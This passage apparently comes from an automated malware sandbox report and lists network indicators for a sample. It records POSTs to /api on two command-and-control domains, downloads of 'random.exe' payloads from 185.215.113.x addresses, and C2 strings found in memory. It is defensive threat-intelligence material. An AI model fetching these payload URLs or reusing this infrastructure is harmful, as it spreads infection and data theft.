                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:57375 -> 172.67.181.203:443
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=elT8Nx84GknMe8V.CgVmO1.HJGy8_N9U4.PaNiEZeq0-1738442713-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0AMDEIVLAM12FGCookie: __cf_mw_byp=elT8Nx84GknMe8V.CgVmO1.HJGy8_N9U4.PaNiEZeq0-1738442713-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OU2X3AKAU9Cookie: __cf_mw_byp=elT8Nx84GknMe8V.CgVmO1.HJGy8_N9U4.PaNiEZeq0-1738442713-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4QU9EUPDCookie: __cf_mw_byp=elT8Nx84GknMe8V.CgVmO1.HJGy8_N9U4.PaNiEZeq0-1738442713-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19910Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N46CM84LU2FFJCookie: __cf_mw_byp=elT8Nx84GknMe8V.CgVmO1.HJGy8_N9U4.PaNiEZeq0-1738442713-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2446Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SB4PTHAR5VJDWCookie: __cf_mw_byp=elT8Nx84GknMe8V.CgVmO1.HJGy8_N9U4.PaNiEZeq0-1738442713-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573153Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=elT8Nx84GknMe8V.CgVmO1.HJGy8_N9U4.PaNiEZeq0-1738442713-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=1xyEpNrsaVWoPSeJNBDexD9lqeLzBV25eIUuV9bg8vE-1738442898-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LY50SICIIEG8BREXCookie: __cf_mw_byp=1xyEpNrsaVWoPSeJNBDexD9lqeLzBV25eIUuV9bg8vE-1738442898-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12847Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=HE5L7Dheg3Z.qNeopVwf4HJ7YnrMdN2j16pZRMT7qN0-1738442909-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0Q8LKK7B5XX7OB4G5SCookie: __cf_mw_byp=HE5L7Dheg3Z.qNeopVwf4HJ7YnrMdN2j16pZRMT7qN0-1738442909-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12859Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LJ4FKLY7SGY0Y29Cookie: __cf_mw_byp=HE5L7Dheg3Z.qNeopVwf4HJ7YnrMdN2j16pZRMT7qN0-1738442909-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15087Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ER7QXVH5MU7JFDCookie: __cf_mw_byp=HE5L7Dheg3Z.qNeopVwf4HJ7YnrMdN2j16pZRMT7qN0-1738442909-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19939Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EN1GUM9EV0PX01VBWCookie: __cf_mw_byp=HE5L7Dheg3Z.qNeopVwf4HJ7YnrMdN2j16pZRMT7qN0-1738442909-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2445Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=QNZfNEjHxycITToSH2gN2Ng6BpfTfbodX7cGYACPYuw-1738442918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NY3PCOCJFYZBL4V4ICookie: __cf_mw_byp=QNZfNEjHxycITToSH2gN2Ng6BpfTfbodX7cGYACPYuw-1738442918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12853Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y6NKDBTYU4Cookie: __cf_mw_byp=HE5L7Dheg3Z.qNeopVwf4HJ7YnrMdN2j16pZRMT7qN0-1738442909-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572772Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5Y56DMPBCookie: __cf_mw_byp=QNZfNEjHxycITToSH2gN2Ng6BpfTfbodX7cGYACPYuw-1738442918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15045Host: warlikedbeliev.org
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ISYJAQ928VWCookie: __cf_mw_byp=QNZfNEjHxycITToSH2gN2Ng6BpfTfbodX7cGYACPYuw-1738442918-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19921Host: warlikedbeliev.org
                            Source: unknownHTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.6:57340 version: TLS 1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0038CE44
                            Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /files/SQL_gulong/random.exe HTTP/1.1Host: 185.215.113.97
                            Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                            Source: global trafficDNS traffic detected: DNS query: rampnatleadk.click
                            Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                            Source: global trafficDNS traffic detected: DNS query: warlikedbeliev.org
                            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rampnatleadk.click
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:45:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zMAwKpFfs5digQLX9ovQha7Rd08fWlxRpA0ZCzwo9azeajOZ7MbLD6a0i8PQDMIGRnxPVQL9kg7d0sj5lZTVwqQIQNJhxp%2BkhzObRpdb%2BcmvqQJUrgDJvPSFY8WfcELtBq41DQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4c8acbff743bc-EWR
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:48:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQxgmbVephIO2%2BwnB78Wwj%2FBdb80utlZIaFk2scohwmr1suCW3wvTKLy%2BGOqwRYlkasWCmLQKRkBBRbpk1uWLZOBR9%2B1i7Ly4KggwicbqKHx3B8MhmQHVdsG582hdJf8YLyQxEM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4cd34c9fa7ca8-EWR
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:48:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w6ArepigdfT8Uf5tNY%2Bh50gLe1tNBVo67agDYkVcS8TEqCFu46CZ7QhX8vGJQUJFNlQGyFf%2FTDLM6O4bkimpwSY5%2FViOvy3gpSXYR4eU1pUQ24of3fqpxzxrKP5jM7W2PvUh2H0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4cd76bd62439c-EWR
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 01 Feb 2025 20:48:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FfpTNWmzfh3sA1FOckNA8l7Us2Z%2FKkA1wHmgy82rEaNZ0yIB8Gxno4anI151vc05j0NMayGQ2G2HWF8J1Q5SZVCk9B1NrpZGe19lDNoBA5LrWduEotP7Bz%2B0hj5b9s6joHPhbA0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90b4cdb1787a4240-EWR
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005599000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.89.222:33791
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.89.222:33791/
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.89.222:33791t-
                            Source: powershell.exe, 00000006.00000002.2190451619.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe450
                            Source: powershell.exe, 00000009.00000002.2267593446.0000018B6D2E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe7
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe?
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeencoded
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exel
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exencodedk
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exep
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exepX
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exer
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exexeV
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exey
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000002.4608251142.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpO
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpc
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/SQL_gulong/random.exe
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/SQL_gulong/random.exeYZ0123456789
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/notfinancing/random.exe
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/notfinancing/random.exeH
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/notfinancing/random.exehqos.dll?
                            Source: skotes.exe, 00000012.00000002.4608251142.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.97/files/notfinancing/random.exep
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                            Source: powershell.exe, 00000006.00000002.2197863521.0000000007950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
                            Source: powershell.exe, 00000006.00000002.2197863521.0000000007950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c8
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                            Source: powershell.exe, 00000006.00000002.2194818093.0000000006116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263806135.0000018B1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263806135.0000018B101B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                            Source: powershell.exe, 00000009.00000002.2206410417.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: 8c36d696e4.exe, 00000015.00000003.4319149983.0000000009017000.00000004.00000020.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4318989846.0000000009017000.00000004.00000020.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4319109876.0000000009017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                            Source: 8c36d696e4.exe, 00000015.00000003.4179429455.0000000009002000.00000004.00000020.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4179485625.0000000009016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oenxt
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: powershell.exe, 00000006.00000002.2190451619.00000000050B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2206410417.0000018B00001000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
